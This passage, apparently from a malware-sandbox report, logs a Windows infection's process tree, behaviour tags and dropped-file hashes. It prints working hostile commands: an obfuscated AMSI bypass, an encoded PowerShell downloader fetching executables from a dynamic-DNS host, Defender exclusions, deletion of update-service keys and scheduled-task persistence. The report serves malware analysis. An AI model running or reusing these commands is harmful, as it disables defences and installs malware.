05)+'g'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+[Char](116)+''+[Char](44)+'V'+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+'l',$CArfIvDcqV,$TFqzdZTyRKKeEw).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');Write-Output $WhRLihQIKyT.CreateType();}$aXXJMMvnGVVJr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType('M'+[Char](105)+''+'c'+''+'r'+'o'+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.W'+'i'+''+'n'+'32'+'.'+'U'+[Char](110)+''+[Char](115)+'a'+[Char](102)+''+'e'+''+'a'+''+[Char](88)+''+[Char](88)+'J'+'M'+''+'M'+''+'v'+''+[Char](110)+''+'G'+'V'+[Char](86)+''+[Char](74)+''+'r'+'');$bZmlWbOgrhIEUP=$aXXJMMvnGVVJr.GetMethod(''+[Char](98)+''+'Z'+''+[Char](109)+'l'+[Char](87)+''+[Char](98)+''+'O'+''+[Char](103)+''+[Char](114)+''+[Char](104)+'I'+[Char](69)+''+[Char](85)+''+[Char](80)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+[Char](44)+''+'S'+'t'+[Char](97)+'t'+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$EIqniKoajOpPjjkpbfM=CiUNqoTXXwiP @([String])([IntPtr]);$ZCfLnVeEwlEznvskIFQsSP=CiUNqoTXXwiP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$zxjEIZtAsKJ=$aXXJMMvnGVVJr.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+'l'+'l'+'')));$MjuYEcjMiJtUKz=$bZmlWbOgrhIEUP.Invoke($Null,@([Object]$zxjEIZtAsKJ,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+'i'+[Char](98)+'r'+[Char](97)+''+[Char](114)+'yA')));$sJIPOgPbSSieCMUHo=$bZmlWbOgrhIEUP.Invoke($Null,@([Object]$zxjEIZtAsKJ,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+'o'+''+[Char](116)+''+'e'+'c'+[Char](116)+'')));$GAkFQRv=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MjuYEcjMiJtUKz,$EIqniKoajOpPjjkpbfM).Invoke(''+[Char](97)+'m'+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$LkkAUNglYmmEBVAkV=$bZmlWbOgrhIEUP.Invoke($Null,@([Object]$GAkFQRv,[Object](''+[Char](65)+'msi'+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+[Char](117)+'f'+'f'+''+[Char](101)+''+[Char](114)+'')));$HQDZyzcnrV=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sJIPOgPbSSieCMUHo,$ZCfLnVeEwlEznvskIFQsSP).Invoke($LkkAUNglYmmEBVAkV,[uint32]8,4,[ref]$HQDZyzcnrV);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LkkAUNglYmmEBVAkV,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($sJIPOgPbSSieCMUHo,$ZCfLnVeEwlEznvskIFQsSP).Invoke($LkkAUNglYmmEBVAkV,[uint32]8,0x20,[ref]$HQDZyzcnrV);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+'T'+''+'W'+''+'A'+''+[Char](82)+''+'E'+'').GetValue(''+'d'+''+'i'+''+'a'+'le'+[Char](114)+'s'+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4164
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1032
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1184
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1296
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1308
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1360
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1372
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2320
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1892
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1992
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1104
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1000
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1764
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2156
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2524
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2656
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2772
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2984
-
C:\Users\Admin\AppData\Local\Temp\b405694fbedc3ed57f486a0bd892fb48b2917d49.exe"C:\Users\Admin\AppData\Local\Temp\b405694fbedc3ed57f486a0bd892fb48b2917d49.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQQBwAHAALgBlAHgAZQAnACkAKQA8ACMAZgBmAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBuAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHkAdwBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAHcAaABrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAagB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAHIAawBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAdQB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAHUAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAPAAjAG0AegBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGEAegB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB3AHUAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAcwBhAGcAIwA+AA=="4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532 -
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4016
-
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4924
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 1363⤵
- Program crash
PID:928
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1620
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5068
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4948
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:116
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1280
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:3884
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:3056
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3528
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1840
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵PID:2216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 2136 -ip 21361⤵PID:4248
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD57b1fe6890101f73a0c9796d8d585b168
SHA156eb99ee341b880cf7a80ebc705371aea87b3743
SHA25693ea56ad38069dbc3d1ae192afd3f3dc8704e9298752f73729b95cf3298dcaca
SHA512fe73cccfadc916f613fbcc7a80ec82ae1228ea2aa28bba4515851e82463e76942ff3a3d6bcc78ea666a841d89220fb49b8fa52279985e88fe0aec6728f21aefa
-
Filesize
53KB
MD5124edf3ad57549a6e475f3bc4e6cfe51
SHA180f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee
-
Filesize
19KB
MD592bec58cd2cf2678713b9abee81eff34
SHA1fb8d9a029250a2ad05dc21e6ea35ae2b613bd407
SHA25689d4ae051dde53382703a63c0557031dbb460591b4cc00ba0156a8319549a281
SHA51281757b65eed23a62c129816467f504c9a96b813c6fcda020a4ac0695abaa7a8fc6d4d1a6bd2817afb9d80dec4ffaab36a9349311f38d93cc2005d28da02a6d9b
-
Filesize
1KB
MD59c5399b260d8be4b4f07477041c4b360
SHA1037222cf2b868ab35dbe98ec1888e109f1d9adbe
SHA256dad72d2563bb676f40f60203eb8fd83ba219f2f83cd2b9a103f5c569e1380092
SHA512b90917d94fcfecd148457a5fe99fd6a5fb41ff77675611ced8b24e59ad58dc9e47a749a3df13017a99f0a121a4c96d55b2c17180accfa05c80a941e1b3e065e3
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
3.7MB
MD5f5c51e7760315ad0f0238d268c03c60e
SHA185ebaaa9685634143a72bc82c6e7df87a78eed4c
SHA256ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
SHA512d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
-
Filesize
1.4MB
MD5b6bbab9f72c88d07b484cc339c475e75
SHA1f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
SHA256dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
SHA5121ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5